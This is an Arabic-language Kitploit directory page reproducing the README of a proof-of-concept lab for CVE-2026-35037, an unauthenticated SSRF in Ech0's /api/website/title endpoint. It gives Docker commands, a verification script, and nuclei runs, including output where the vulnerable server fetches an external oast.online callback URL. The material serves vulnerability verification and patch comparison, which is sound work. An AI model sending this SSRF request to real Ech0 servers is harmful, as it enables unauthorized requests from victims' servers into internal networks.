Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
POC_CVE-2026-35037 — مختبر عزل محلي لإعادة إنتاج CVE-2026-35037، وهي ثغرة SSRF غير مصادقة في نقطة نهاية GET /api/website/title الخاصة بـ Ech0. يتضمن إعداد Docker Compose وسكربت تحقق وقالب nuclei للتحقق. | Kitploit
أدوات/GitHubGitHub/fineman999/poc_cve-2026-35037
تحليل الثغرات الأمنيةالاستغلالأمن الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubfineman999/poc_cve-2026-35037

POC_CVE-2026-35037

مختبر عزل محلي لإعادة إنتاج CVE-2026-35037، وهي ثغرة SSRF غير مصادقة في نقطة نهاية GET /api/website/title الخاصة بـ Ech0. يتضمن إعداد Docker Compose وسكربت تحقق وقالب nuclei للتحقق.

عرض المستودع
2منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مختبر CVE-2026-35037 Ech0 SSRF

يحتوي هذا المستودع على مختبر محلي معزول لإعادة إنتاج ثغرة CVE-2026-35037، وهي ثغرة SSRF غير موثقة في نقطة النهاية GET /api/website/title الخاصة بـ Ech0.

يستخدم المختبر خادم أدلة محليًا خاضعًا للتحكم بدلاً من البيانات الوصفية السحابية أو البنية التحتية لجهة خارجية.

ملخص

  • المنتج: lin-snow/Ech0
  • الثغرة: تزوير الطلب من جانب الخادم
  • CVE: CVE-2026-35037
  • GHSA: GHSA-cqgf-f4x7-g6wc
  • الإصدارات المتأثرة: تذكر GHSA <= 4.2.1؛ ويصف NVD الإصدارات السابقة لـ 4.2.8
  • الإصدار المُصحَّح: 4.2.8
  • نقطة النهاية:
GET /api/website/title
  • المُعامِل: website_url
  • المصادقة: غير مطلوبة في الإصدار الضعيف
  • المراجع:

    • https://nvd.nist.gov/vuln/detail/CVE-2026-35037
    • https://github.com/lin-snow/Ech0/security/advisories/GHSA-cqgf-f4x7-g6wc

    الملفات

    • docker-compose.yml: يقوم بتشغيل Ech0 وخادم HTTP محلي للأدلة
    • Dockerfile.ech0-lab: يبني Ech0 من العلامة الرسمية على GitHub
    • verify-cve-2026-35037.sh: يرسل طلب التحقق من SSRF الخاضع للتحكم
    • evidence/index.html: صفحة HTML خاضعة للتحكم مع عنوان <title> فريد
    • nuclei/CVE-2026-35037.yaml: قالب nuclei مرشح

    لماذا البناء من المصدر؟

    العلامات القديمة الضعيفة لـ Docker مثل sn0wl1n/ech0:4.2.1 لم تكن متاحة عند إنشاء هذا المختبر. بدلاً من ذلك، يبني المختبر من العلامات الرسمية lin-snow/Ech0 على GitHub:

    • v4.2.1 للمرشح الضعيف
    • v4.2.8 للمقارنة المُصحَّحة

    يتجنب ملف Dockerfile المحلي أيضًا مشكلات البناء من المنبع التي لوحظت مع build.Dockerfile القديم.

    المتطلبات

    • محرك Docker أو Docker Desktop
    • curl
    • اختياري: nuclei

    شغّل هذا فقط في مختبر محلي معزول. لا تستخدم هذه الأوامر ضد أنظمة طرف ثالث. استخدمها فقط ضد أنظمة تملكها أو لديك إذن كتابي صريح لاختبارها.

    إعادة إنتاج السلوك الضعيف

    تشغيل Ech0 v4.2.1:

    root@kitploit:~
    ECH0_TAG=4.2.1 docker compose up -d --build
    

    أرسل طلب التحقق الخاضع للتحكم:

    root@kitploit:~
    sh verify-cve-2026-35037.sh
    

    الاستجابة المتوقعة للثغرة:

    root@kitploit:~
    HTTP/1.1 200 OK
    Content-Type: application/json; charset=utf-8
    
    {"code":1,"msg":"获取网站标题成功","data":"ECH0-SSRF-CVE-2026-35037"}
    

    تأكد من أن Ech0 وصل إلى خادم الأدلة الخاضع للتحكم:

    root@kitploit:~
    docker compose logs evidence
    

    سجل الأدلة المُشاهَد:

    root@kitploit:~
    ech0-cve-2026-35037-evidence  | 192.168.107.3 - - [20/May/2026 03:48:51] "GET / HTTP/1.1" 200 -
    

    مقارنة مع الإصدار المُصحَّح

    تشغيل Ech0 v4.2.8:

    root@kitploit:~
    docker compose down -v
    ECH0_TAG=4.2.8 docker compose up -d --build
    

    تشغيل نفس الطلب:

    root@kitploit:~
    sh verify-cve-2026-35037.sh
    

    الاستجابة المُصحَّحة المُشاهَدة:

    root@kitploit:~
    HTTP/1.1 401 Unauthorized
    Content-Type: application/json; charset=utf-8
    
    {"code":0,"msg":"未找到令牌,请点击右上角登录","error_code":"TOKEN_MISSING","message_key":"auth.token_missing","data":null}
    

    التحقق باستخدام Nuclei

    التحقق من صحة القالب:

    root@kitploit:~
    nuclei -validate -t nuclei/CVE-2026-35037.yaml
    

    التشغيل ضد الإصدار الضعيف v4.2.1:

    root@kitploit:~
    nuclei -t nuclei/CVE-2026-35037.yaml -u http://127.0.0.1:6277
    

    النتيجة الضعيفة المُشاهَدة:

    root@kitploit:~
    [INF] Using Interactsh Server: oast.online
    [CVE-2026-35037] [http] [high] http://127.0.0.1:6277/api/website/title?website_url=http://d86j283ea0u4jbaqj8dgo4cgc4jhn7r3f.oast.online/
    [INF] Scan completed in 6.425886625s. 1 matches found.
    

    التشغيل ضد الإصدار المُصحَّح v4.2.8:

    root@kitploit:~
    nuclei -t nuclei/CVE-2026-35037.yaml -u http://127.0.0.1:6277
    

    النتيجة المُصحَّحة المُشاهَدة:

    root@kitploit:~
    [INF] Using Interactsh Server: oast.fun
    [INF] Scan completed in 5.974574416s. No results found.
    

    التنظيف

    root@kitploit:~
    docker compose down -v
    

    ملاحظات

    • يستخدم المختبر اليدوي http://evidence:8080/ داخل شبكة Docker Compose.
    • يستخدم قالب nuclei {{interactsh-url}} ويتطلب دعم OAST/interactsh.
    • يستخدم قالب nuclei {{interactsh-url}}، والذي يتصل بخوادم interactsh الخاصة بـ ProjectDiscovery مثل oast.online أو oast.fun افتراضيًا. استخدم -iserver لتجاوز الخادم أو -ni لتعطيل interactsh.
    • لا يختبر المختبر نقاط نهاية البيانات الوصفية السحابية.
    • لا يتصل المختبر بأهداف إنتاجية أو تابعة لجهات خارجية باستثناء تنزيلات التبعيات/الصور العادية أثناء بناء Docker.
    تنزيل الأداة